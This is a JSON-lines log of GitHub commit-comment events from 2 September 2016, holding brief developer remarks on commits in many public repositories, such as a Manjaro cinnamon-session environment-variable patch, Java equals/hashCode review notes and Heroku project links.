{"id":"4506902130","type":"CommitCommentEvent","actor":{"login":"chdi"},"repo":{"name":"chdi/MWPhotoBrowser"},"payload":{"comment":{"id":18875960,"position":12,"line":99,"path":"Pod/Classes/MWPhotoBrowser.m","commit_id":"dd859c908489f6bad18eb55a78dce8f8a9188ff6","created_at":"2016-09-02T06:58:20Z","updated_at":"2016-09-02T06:58:20Z","body":"Nicht wundern. Ich möchte nicht den memory-cache leeren, weil sonst auch andere Bilder von der App aus dem Cache geleert werden."}},"created_at":"2016-09-02T06:58:20Z"}
{"id":"4506904025","type":"CommitCommentEvent","actor":{"login":"fukuda-nanami"},"repo":{"name":"fukuda-nanami/ToDoList"},"payload":{"comment":{"id":18875965,"position":null,"line":null,"path":null,"commit_id":"af94b7e46e77d994dd3b3c7ee718a7172fb55e67","created_at":"2016-09-02T06:58:57Z","updated_at":"2016-09-02T06:58:57Z","body":"https://evening-sierra-11577.herokuapp.com/\r\n\r\n完成しました"}},"created_at":"2016-09-02T06:58:57Z"}
{"id":"4506904422","type":"CommitCommentEvent","actor":{"login":"samitsv"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":18875967,"position":null,"line":null,"path":null,"commit_id":"893dc44a41c863e69b2c6c3bde5b4d455e23b4c3","created_at":"2016-09-02T06:59:05Z","updated_at":"2016-09-02T06:59:05Z","body":"the image file name changes like resources/pokemonIcons/seaking-f.gif → resources/pokemonIcons/seaking.gif"}},"created_at":"2016-09-02T06:59:05Z"}
{"id":"4506904514","type":"CommitCommentEvent","actor":{"login":"fukushiro-sumire"},"repo":{"name":"fukushiro-sumire/ToDoList"},"payload":{"comment":{"id":18875968,"position":null,"line":null,"path":null,"commit_id":"4877cc8354bde4cd9b87ec9962cef39a5848ca89","created_at":"2016-09-02T06:59:07Z","updated_at":"2016-09-02T06:59:07Z","body":"https://aqueous-headland-80447.herokuapp.com/\r\n完成しました"}},"created_at":"2016-09-02T06:59:07Z"}
{"id":"4506905307","type":"CommitCommentEvent","actor":{"login":"pftx"},"repo":{"name":"pftx/niolex-network-nio"},"payload":{"comment":{"id":18875971,"position":null,"line":null,"path":null,"commit_id":"cddadec51ed93e2e3730e7258e27d9c9f376d194","created_at":"2016-09-02T06:59:22Z","updated_at":"2016-09-02T06:59:22Z","body":"Affected config-core and rpc-core"}},"created_at":"2016-09-02T06:59:22Z"}
{"id":"4506906606","type":"CommitCommentEvent","actor":{"login":"fukuda-nanami"},"repo":{"name":"fukuda-nanami/ToDoList"},"payload":{"comment":{"id":18875972,"position":null,"line":null,"path":null,"commit_id":"af94b7e46e77d994dd3b3c7ee718a7172fb55e67","created_at":"2016-09-02T06:59:47Z","updated_at":"2016-09-02T06:59:47Z","body":"https://evening-sierra-11577.herokuapp.com/\r\n\r\nたぶん完成したと思います"}},"created_at":"2016-09-02T06:59:47Z"}
{"id":"4506906787","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"navyad/ChatterBot"},"payload":{"comment":{"id":18875973,"position":null,"line":null,"path":null,"commit_id":"df91ecdb5f60c5b916c1edd2d745830047045ea7","created_at":"2016-09-02T06:59:50Z","updated_at":"2016-09-02T06:59:50Z","body":"created generic function __statement_filter() for filtering statement table."}},"created_at":"2016-09-02T06:59:50Z"}
{"id":"4506906938","type":"CommitCommentEvent","actor":{"login":"fukushiro-sumire"},"repo":{"name":"fukushiro-sumire/ToDoList"},"payload":{"comment":{"id":18875974,"position":null,"line":null,"path":null,"commit_id":"4877cc8354bde4cd9b87ec9962cef39a5848ca89","created_at":"2016-09-02T06:59:53Z","updated_at":"2016-09-02T06:59:53Z","body":"https://aqueous-headland-80447.herokuapp.com/\r\nたぶん完成したと思います"}},"created_at":"2016-09-02T06:59:53Z"}
{"id":"4506907166","type":"CommitCommentEvent","actor":{"login":"senta"},"repo":{"name":"senta/.dotfiles"},"payload":{"comment":{"id":18875975,"position":null,"line":null,"path":null,"commit_id":"dc557fd8a8b03a1fe4d40ce132fb8d46acaf43a6","created_at":"2016-09-02T06:59:58Z","updated_at":"2016-09-02T06:59:58Z","body":"https://github.com/sjl/z-fish/blob/master/z.fish"}},"created_at":"2016-09-02T06:59:58Z"}
{"id":"4506907477","type":"CommitCommentEvent","actor":{"login":"other-people"},"repo":{"name":"other-people/git-learn"},"payload":{"comment":{"id":18875978,"position":null,"line":null,"path":null,"commit_id":"03403c5f7ff225e32f2074f531b4da0135d797a0","created_at":"2016-09-02T07:00:05Z","updated_at":"2016-09-02T07:00:05Z","body":"this's what"}},"created_at":"2016-09-02T07:00:05Z"}
{"id":"4506908372","type":"CommitCommentEvent","actor":{"login":"stefankosc"},"repo":{"name":"stefankosc/express-project"},"payload":{"comment":{"id":18875980,"position":25,"line":105,"path":"index.js","commit_id":"10ca968a6ebde84ca494570268f8759b5ac447d0","created_at":"2016-09-02T07:00:21Z","updated_at":"2016-09-02T07:00:21Z","body":"ok, I will change this before next commit"}},"created_at":"2016-09-02T07:00:21Z"}
{"id":"4506908511","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"navyad/ChatterBot"},"payload":{"comment":{"id":18875981,"position":null,"line":null,"path":null,"commit_id":"b5b9d80c2bcffe18b11f2c8bec357eb355d96c33","created_at":"2016-09-02T07:00:23Z","updated_at":"2016-09-02T07:00:23Z","body":"minor refactor"}},"created_at":"2016-09-02T07:00:23Z"}
{"id":"4506911799","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"navyad/ChatterBot"},"payload":{"comment":{"id":18876010,"position":null,"line":null,"path":null,"commit_id":"d05541a809672bfdbfc4b9bceecb6a3f5e64003b","created_at":"2016-09-02T07:01:20Z","updated_at":"2016-09-02T07:01:20Z","body":"mistakenly added this."}},"created_at":"2016-09-02T07:01:20Z"}
{"id":"4506913010","type":"CommitCommentEvent","actor":{"login":"alperbas"},"repo":{"name":"cerenh/LinxEd"},"payload":{"comment":{"id":18876013,"position":null,"line":null,"path":null,"commit_id":"e387f0d1f956e2947aaf4c7ddfb92493146f243c","created_at":"2016-09-02T07:01:41Z","updated_at":"2016-09-02T07:01:41Z","body":"#4  "}},"created_at":"2016-09-02T07:01:41Z"}
{"id":"4506915787","type":"CommitCommentEvent","actor":{"login":"banricho"},"repo":{"name":"ElemeFE/vue-img"},"payload":{"comment":{"id":18876018,"position":6,"line":7,"path":"src/get-src.js","commit_id":"01a6e2bb5314a384014381f20031c97339d998ba","created_at":"2016-09-02T07:02:27Z","updated_at":"2016-09-02T07:02:27Z","body":"安全部门关键词扫描到这里了， 邮件通报我了 =_="}},"created_at":"2016-09-02T07:02:27Z"}
{"id":"4506920107","type":"CommitCommentEvent","actor":{"login":"stefankosc"},"repo":{"name":"stefankosc/express-project"},"payload":{"comment":{"id":18876026,"position":62,"line":140,"path":"index.js","commit_id":"10ca968a6ebde84ca494570268f8759b5ac447d0","created_at":"2016-09-02T07:03:38Z","updated_at":"2016-09-02T07:03:38Z","body":"ok, I can change that"}},"created_at":"2016-09-02T07:03:38Z"}
{"id":"4506920581","type":"CommitCommentEvent","actor":{"login":"rohitporoli"},"repo":{"name":"Cardinal-AOSP/frameworks_base"},"payload":{"comment":{"id":18876028,"position":null,"line":null,"path":null,"commit_id":"753444c79252e330846281fd18e10f70ba45e5eb","created_at":"2016-09-02T07:03:47Z","updated_at":"2016-09-02T07:03:47Z","body":"Why do you do this!? I cry everytime @Adarsh-MR :cry: "}},"created_at":"2016-09-02T07:03:47Z"}
{"id":"4506924086","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18876037,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-02T07:04:52Z","updated_at":"2016-09-02T07:04:52Z","body":"@nyalldawson Just a quick update. The upsidedown bug is fixed. Variable 'orientation' should have been primed inside the for loop. However, with 'Line orientation dependent position' off, some labels are plotted on the wrong side of the line. In curvedPlacementAtOffset the line angle is calculated for the whole line segment, I think it should be calculated for the piece under consideration (depending on distance). Do you agree?"}},"created_at":"2016-09-02T07:04:52Z"}
{"id":"4506924142","type":"CommitCommentEvent","actor":{"login":"df8oe"},"repo":{"name":"df8oe/mchf-github"},"payload":{"comment":{"id":18876038,"position":null,"line":null,"path":null,"commit_id":"349eeae7e1f9c6703caf06ba4af137153e676377","created_at":"2016-09-02T07:04:53Z","updated_at":"2016-09-02T07:04:53Z","body":"Many thanks - I have not noticed the existence of this new function :)\r\n\r\nI will swap this next commit."}},"created_at":"2016-09-02T07:04:53Z"}
{"id":"4506929385","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18876056,"position":null,"line":null,"path":null,"commit_id":"7e8a08c3516d8f5e48882a01a2ccdb8881dd8283","created_at":"2016-09-02T07:06:30Z","updated_at":"2016-09-02T07:06:30Z","body":">Note to self: drycoding is bad\r\n\r\nPlease keep the commit in the standard format"}},"created_at":"2016-09-02T07:06:30Z"}
{"id":"4506930607","type":"CommitCommentEvent","actor":{"login":"atnak"},"repo":{"name":"graphite-project/graphite-web"},"payload":{"comment":{"id":18876064,"position":5,"line":2803,"path":"webapp/graphite/render/functions.py","commit_id":"73b6198b8d2aa888477f61d56a24931f875c9888","created_at":"2016-09-02T07:06:49Z","updated_at":"2016-09-02T07:06:49Z","body":"@cbowman0 Heads up that this line breaks `aliasByNode()`.\r\n\r\n(I also noticed memory usage going over the roof with this, but I'm not sure it was caused by this directly or if it's from `aliasByNode()` throwing an exception and `uwsgi` doing something strange.)\r\n\r\nIf it's all the same (and I couldn't determine how it's used in the test), maybe it should be changed back?  Or perhaps `series.name` should be changed to just `transformNull(%s,%g)` regardless of `referenceSeries` it's the cause of confusion.\r\n\r\nI've opened a PR to follow this here: https://github.com/graphite-project/graphite-web/pull/1669\r\n\r\n"}},"created_at":"2016-09-02T07:06:49Z"}
{"id":"4506930746","type":"CommitCommentEvent","actor":{"login":"guox191"},"repo":{"name":"ElemeFE/vue-img"},"payload":{"comment":{"id":18876065,"position":6,"line":7,"path":"src/get-src.js","commit_id":"01a6e2bb5314a384014381f20031c97339d998ba","created_at":"2016-09-02T07:06:52Z","updated_at":"2016-09-02T07:06:52Z","body":"....+1s"}},"created_at":"2016-09-02T07:06:52Z"}
{"id":"4506934005","type":"CommitCommentEvent","actor":{"login":"db4ple"},"repo":{"name":"df8oe/mchf-github"},"payload":{"comment":{"id":18876078,"position":null,"line":null,"path":null,"commit_id":"349eeae7e1f9c6703caf06ba4af137153e676377","created_at":"2016-09-02T07:07:35Z","updated_at":"2016-09-02T07:07:35Z","body":":-) \r\nThat's why I made this comment. It is hard to remember all the functions and track all the changes for any of us."}},"created_at":"2016-09-02T07:07:35Z"}
{"id":"4506935589","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18876079,"position":31,"line":46,"path":"subprojects/launcher/src/main/java/org/gradle/launcher/daemon/server/health/MemoryInfo.java","commit_id":"4b003df40c373c85ebc715d65c12ad92a1f07ff7","created_at":"2016-09-02T07:08:04Z","updated_at":"2016-09-02T07:08:04Z","body":"What about pre-4.0? Until a month ago I was still on 3.x, and lots of LTS users are on 2.x or 3.x."}},"created_at":"2016-09-02T07:08:04Z"}
{"id":"4506935710","type":"CommitCommentEvent","actor":{"login":"akilystic"},"repo":{"name":"akilystic/akilystic.github.io"},"payload":{"comment":{"id":18876081,"position":null,"line":null,"path":null,"commit_id":"1b83b2b552c14e590f8f305af37ce6b602f0c4e3","created_at":"2016-09-02T07:08:09Z","updated_at":"2016-09-02T07:08:09Z","body":"test"}},"created_at":"2016-09-02T07:08:09Z"}
{"id":"4506936989","type":"CommitCommentEvent","actor":{"login":"402392291"},"repo":{"name":"AlloyTeam/Mars"},"payload":{"comment":{"id":18876087,"position":4,"line":10,"path":"demos/touchevents.html","commit_id":"69d7ab0d03c027e07c27219a2fd08264347a10e8","created_at":"2016-09-02T07:08:30Z","updated_at":"2016-09-02T07:08:30Z","body":"寺"}},"created_at":"2016-09-02T07:08:30Z"}
{"id":"4506937769","type":"CommitCommentEvent","actor":{"login":"minchyeah"},"repo":{"name":"minchyeah/WeChatPersonal-"},"payload":{"comment":{"id":18876090,"position":null,"line":null,"path":null,"commit_id":"3cc7da5255d5019ca08d229fb08ec7317851137d","created_at":"2016-09-02T07:08:45Z","updated_at":"2016-09-02T07:08:45Z","body":"**微信个人号**"}},"created_at":"2016-09-02T07:08:45Z"}
{"id":"4506940400","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"RestComm/sbc"},"payload":{"comment":{"id":18876094,"position":44,"line":85,"path":"application/src/main/java/org/restcomm/sbc/managers/LocationManager.java","commit_id":"70ee5e94a02811fce008bf8e0effe1b9c7b36fb4","created_at":"2016-09-02T07:09:33Z","updated_at":"2016-09-02T07:09:33Z","body":"Wouldn't it make more sense to use a concatenation of user + host for the cache key ? What happens if the user is correct in 83 but the host equals fails in 84 ? We wouldn't retry to find another user that would match the correct host."}},"created_at":"2016-09-02T07:09:33Z"}
{"id":"4506941250","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"RestComm/sbc"},"payload":{"comment":{"id":18876096,"position":16,"line":124,"path":"application/src/main/java/org/restcomm/sbc/bo/Location.java","commit_id":"70ee5e94a02811fce008bf8e0effe1b9c7b36fb4","created_at":"2016-09-02T07:09:50Z","updated_at":"2016-09-02T07:09:50Z","body":"hashCode should be implemented too if equals is implemented."}},"created_at":"2016-09-02T07:09:50Z"}
{"id":"4506942060","type":"CommitCommentEvent","actor":{"login":"Holyoneqt"},"repo":{"name":"MrSn1ck3rs/Hello426"},"payload":{"comment":{"id":18876099,"position":2,"line":2,"path":"aaaaaaaayyyyyyyy.txt","commit_id":"b39f93619ae9fc731156b6308bee4dc4549c1730","created_at":"2016-09-02T07:10:06Z","updated_at":"2016-09-02T07:10:06Z","body":":+1: :100: aaay some good shit :fire: :100: :+1: :ok_hand: :100: :fire: :ok_hand: "}},"created_at":"2016-09-02T07:10:06Z"}
{"id":"4506942148","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876100,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:10:07Z","updated_at":"2016-09-02T07:10:07Z","body":"It works like this! I've tested it. I have adjusted the patch and removed QT_STYLE_OVERRIDE"}},"created_at":"2016-09-02T07:10:07Z"}
{"id":"4506942741","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"RestComm/sbc"},"payload":{"comment":{"id":18876101,"position":15,"line":123,"path":"application/src/main/java/org/restcomm/sbc/bo/Location.java","commit_id":"70ee5e94a02811fce008bf8e0effe1b9c7b36fb4","created_at":"2016-09-02T07:10:15Z","updated_at":"2016-09-02T07:10:15Z","body":"hashCode method should be implemented too if equals is implemented."}},"created_at":"2016-09-02T07:10:15Z"}
{"id":"4506944209","type":"CommitCommentEvent","actor":{"login":"lucienfostier"},"repo":{"name":"ImageEngine/gaffer"},"payload":{"comment":{"id":18876105,"position":1,"line":1,"path":"src/GafferAppleseed/AppleseedRender.cpp","commit_id":"0bbba1e94715865c8f862c1d412df273a3c3217a","created_at":"2016-09-02T07:10:39Z","updated_at":"2016-09-02T07:10:39Z","body":"Hi Esteban,\r\n\r\nIs there a specific reason to have many classes defined under the same file?Splitting would be nice to help readability.\r\n\r\nCheers"}},"created_at":"2016-09-02T07:10:39Z"}
{"id":"4506944843","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876106,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:10:51Z","updated_at":"2016-09-02T07:10:51Z","body":"The old patch was setting QT_STYLE:OVERRIDE=gtk and that's a problem for the latest version of **qt5ct** as we know :wink: "}},"created_at":"2016-09-02T07:10:51Z"}
{"id":"4506950178","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876119,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:12:27Z","updated_at":"2016-09-02T07:12:27Z","body":"I had removed [this](https://github.com/manjaro/packages-community/commit/a84da7445082576eb6e45bc00c4a989695db247c#diff-9ea21d1e8b22d999daa0d9260ed31aacR69)"}},"created_at":"2016-09-02T07:12:27Z"}
{"id":"4506950264","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18876120,"position":null,"line":null,"path":null,"commit_id":"a260a2d92e0a5b8700fdcdfe1887386119421c73","created_at":"2016-09-02T07:12:29Z","updated_at":"2016-09-02T07:12:29Z","body":"Thanks for the answer...Hey anybody have tried interfacing DW1000 sensor with pixhawk then please let me know"}},"created_at":"2016-09-02T07:12:29Z"}
{"id":"4506950697","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876122,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:12:36Z","updated_at":"2016-09-02T07:12:36Z","body":"The old patch was buggus. I've used the reworked patch. Please check **v1.3**."}},"created_at":"2016-09-02T07:12:36Z"}
{"id":"4506957077","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876141,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:14:30Z","updated_at":"2016-09-02T07:14:30Z","body":"But it writes qt_style_override again, doesn't it?"}},"created_at":"2016-09-02T07:14:30Z"}
{"id":"4506965959","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876161,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:17:04Z","updated_at":"2016-09-02T07:17:04Z","body":"Just a while ago both env vars were needed. But meanwhile qt5ct wants only qt_qpa_platformtheme set and not qt_style_override.\r\nI'll test pkgrel **1.3** in a second, but **1.2** worked perfectly for me."}},"created_at":"2016-09-02T07:17:04Z"}
{"id":"4506974161","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":18876177,"position":17,"line":93,"path":"concrete/src/Attribute/Controller.php","commit_id":"75e5da3317b8700459265e0ff56f4a22f49bb957","created_at":"2016-09-02T07:19:26Z","updated_at":"2016-09-02T07:19:26Z","body":"@aembler Are sure this is correct?"}},"created_at":"2016-09-02T07:19:26Z"}
{"id":"4506974862","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"thejameskyle/pretty-format"},"payload":{"comment":{"id":18876178,"position":null,"line":null,"path":null,"commit_id":"824b7ca29dbfb9f8ed3503318cc32187466be876","created_at":"2016-09-02T07:19:38Z","updated_at":"2016-09-02T07:19:38Z","body":"Can we add it to the documentation? This is a nice plugin, I actually wrote a very similar one some time ago: https://github.com/algolia/react-element-to-jsx-string\r\n\r\nNice to see you took the same approach :p"}},"created_at":"2016-09-02T07:19:38Z"}
{"id":"4506975372","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18876181,"position":null,"line":null,"path":null,"commit_id":"e576714f6b4829763b797c552217a14e6d30ca59","created_at":"2016-09-02T07:19:46Z","updated_at":"2016-09-02T07:19:46Z","body":"@smalyshev this fix seems not be complete see https://github.com/kkos/oniguruma/commit/151b6b42599d2f8aa10edd4114ce84815ec2efc5 in the followup discusson on https://github.com/kkos/oniguruma/issues/16"}},"created_at":"2016-09-02T07:19:46Z"}
{"id":"4506975460","type":"CommitCommentEvent","actor":{"login":"Ankitsrist"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":18876180,"position":51,"line":85,"path":"src/isomorphic/hooks/ReactComponentTreeHook.js","commit_id":"ea494a2c1082c705ef79d0b73516aa6923a4c75a","created_at":"2016-09-02T07:19:46Z","updated_at":"2016-09-02T07:19:46Z","body":"good"}},"created_at":"2016-09-02T07:19:46Z"}
{"id":"4506976957","type":"CommitCommentEvent","actor":{"login":"rohitdatta"},"repo":{"name":"formspree/formspree"},"payload":{"comment":{"id":18876184,"position":29,"line":64,"path":"formspree/forms/helpers.py","commit_id":"d1d884ccee3b1e7969fc22e358de0f5f40f273ad","created_at":"2016-09-02T07:20:14Z","updated_at":"2016-09-02T07:20:14Z","body":"@fiatjaf: Why are the keys being sorted alphabetically instead of in the order they are in the form?"}},"created_at":"2016-09-02T07:20:14Z"}
{"id":"4506979863","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876191,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:21:08Z","updated_at":"2016-09-02T07:21:08Z","body":"**1.3** checks the given **ENVVALs** and [sets them](https://github.com/linuxmint/cinnamon-session/pull/75/files) if needed. Since we don't use **QT_STYLE_OVERRIDE** it won't get set."}},"created_at":"2016-09-02T07:21:08Z"}
{"id":"4506980847","type":"CommitCommentEvent","actor":{"login":"Spillblood"},"repo":{"name":"Spillblood/TestingProject"},"payload":{"comment":{"id":18876193,"position":null,"line":null,"path":null,"commit_id":"5c1a833949c1e9c3c536abc0791456c89346a539","created_at":"2016-09-02T07:21:23Z","updated_at":"2016-09-02T07:21:23Z","body":"I'm just learning how to use Git...."}},"created_at":"2016-09-02T07:21:23Z"}
{"id":"4506983508","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876197,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:22:10Z","updated_at":"2016-09-02T07:22:10Z","body":"No. Sorry. Look:\r\n```\r\n```\r\necho $QT_STYLE_OVERRIDE\r\ngtk\r\n[cinnamon@oberon ~]$ echo $QT_QPA_PLATFORMTHEME\r\nqt5ct\r\n[cinnamon@oberon ~]$ pacman -Q cinnamon-session\r\ncinnamon-session 3.0.1-1.3\r\n```\r\nThat's not what we want"}},"created_at":"2016-09-02T07:22:10Z"}
{"id":"4506984715","type":"CommitCommentEvent","actor":{"login":"swathi-ssunder"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":18876201,"position":null,"line":null,"path":null,"commit_id":"893dc44a41c863e69b2c6c3bde5b4d455e23b4c3","created_at":"2016-09-02T07:22:30Z","updated_at":"2016-09-02T07:22:30Z","body":"@samitsv - I get that. But there are name changes such as farfetchd.gif → farfetch'd.gif, nidoran-m.gif → nidoran ♂.gif, which is why I asked."}},"created_at":"2016-09-02T07:22:30Z"}
{"id":"4506985305","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876203,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:22:40Z","updated_at":"2016-09-02T07:22:40Z","body":"With pkgrel **1.2**:\r\n```\r\n```\r\necho $QT_STYLE_OVERRIDE\r\n\r\n[cinnamon@oberon ~]$ echo $QT_QPA_PLATFORMTHEME\r\nqt5ct\r\n[cinnamon@oberon ~]$ pacman -Q cinnamon-session\r\ncinnamon-session 3.0.1-1.2\r\n```\r\n"}},"created_at":"2016-09-02T07:22:40Z"}
{"id":"4506987882","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"alaney/arduino-mavlink"},"payload":{"comment":{"id":18876204,"position":null,"line":null,"path":null,"commit_id":"4d71dc5eecd4dda262237081a07c07963e8136ef","created_at":"2016-09-02T07:23:24Z","updated_at":"2016-09-02T07:23:24Z","body":"Hey @alaney,I admire your work....my project requires me to interface arduino Uno with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-02T07:23:24Z"}
{"id":"4506990003","type":"CommitCommentEvent","actor":{"login":"AcidNinjaFWHR"},"repo":{"name":"paly2/Mynetest-server"},"payload":{"comment":{"id":18876207,"position":18,"line":14,"path":"scripts/run.sh","commit_id":"49f3d1c77d51fcf506d5fae4557b98546c655854","created_at":"2016-09-02T07:24:01Z","updated_at":"2016-09-02T07:24:01Z","body":"-c 1 will restrict to 1 cpu (most servers have 1 cpu so if you have 1, you can remove this option as it autodetects it).\r\n\r\nbut -l 1 means 1% of your whole cpu power so **beware** because if your cpu has 4 cores, the max would be 400 (not 100)\r\nSo you might wanna check the number of cores of your cpu and adjust this 1 a bit upper.\r\n2% of your cpu would be the value 4 if you have 2 cores, 8 if you have 4 cores etc. :)"}},"created_at":"2016-09-02T07:24:01Z"}
{"id":"4506990131","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876208,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:24:03Z","updated_at":"2016-09-02T07:24:03Z","body":"Yeah, I found the issue. If null it sets it to **gtk**:\r\n\r\n```\r\nif (NULL == g_getenv (\"QT_STYLE_OVERRIDE\")) {\r\n  csm_util_setenv (\"QT_STYLE_OVERRIDE\", \"gtk\");\r\n}\r\n```"}},"created_at":"2016-09-02T07:24:03Z"}
{"id":"4506990396","type":"CommitCommentEvent","actor":{"login":"maasencioh"},"repo":{"name":"mljs/ml"},"payload":{"comment":{"id":18876210,"position":8,"line":14,"path":"README.md","commit_id":"2a6d349ed1cca45076faee26d049a40b47e1fd23","created_at":"2016-09-02T07:24:08Z","updated_at":"2016-09-02T07:24:08Z","body":"oups! sorry, I'll put it back"}},"created_at":"2016-09-02T07:24:08Z"}
{"id":"4506991139","type":"CommitCommentEvent","actor":{"login":"dlemstra"},"repo":{"name":"JimBobSquarePants/ImageProcessor"},"payload":{"comment":{"id":18876211,"position":13,"line":19,"path":"src/ImageProcessorCore/Image/ImageBase.cs","commit_id":"9d5d3ae4df90d8cd7d589fe02aa08c9d2e3f34e2","created_at":"2016-09-02T07:24:20Z","updated_at":"2016-09-02T07:24:20Z","body":"Why do we need to make the class unsafe?"}},"created_at":"2016-09-02T07:24:20Z"}
{"id":"4506991937","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876216,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:24:31Z","updated_at":"2016-09-02T07:24:31Z","body":"I think I find a way to fix it."}},"created_at":"2016-09-02T07:24:31Z"}
{"id":"4506992096","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876217,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:24:34Z","updated_at":"2016-09-02T07:24:34Z","body":"Exactly that's what I had ramoved :wink:"}},"created_at":"2016-09-02T07:24:34Z"}
{"id":"4506993329","type":"CommitCommentEvent","actor":{"login":"Daveee10"},"repo":{"name":"ClockSelect/myevic"},"payload":{"comment":{"id":18876221,"position":null,"line":null,"path":null,"commit_id":"1ee5daf5d6856b88ce32fda5b38e8b6d8195a7df","created_at":"2016-09-02T07:24:54Z","updated_at":"2016-09-02T07:24:54Z","body":"Looks good. In past dayt i tried a lot with this but the biggest problem how when i firing the clock is running.\r\n\r\n\r\n"}},"created_at":"2016-09-02T07:24:54Z"}
{"id":"4506993668","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"HertBox/Pixhawk-Arduino-Mavlink"},"payload":{"comment":{"id":18876222,"position":null,"line":null,"path":null,"commit_id":"fc066dec0c660419f15205be58641318b2575064","created_at":"2016-09-02T07:25:00Z","updated_at":"2016-09-02T07:25:00Z","body":"Hey Hertbox,I admire your work....my project requires me to interface arduino Uno with pixhawk but have no idea how to do that....can you please explain me by a simple code how to collect serial data coming out of arduino by pixhawk and send to ground station.....lets say arduino is giving out data like 1,2.5 on serial port and the same data needs to be collected by pixhawk to send to ground station...kindly help when you get time"}},"created_at":"2016-09-02T07:25:00Z"}
{"id":"4506993915","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876223,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:25:04Z","updated_at":"2016-09-02T07:25:04Z","body":"I don't know what you don't like about 1.2 but you know better of course :)"}},"created_at":"2016-09-02T07:25:04Z"}
{"id":"4506995384","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18876233,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T07:25:29Z","updated_at":"2016-09-02T07:25:29Z","body":"The result is ok in any case I thought."}},"created_at":"2016-09-02T07:25:29Z"}
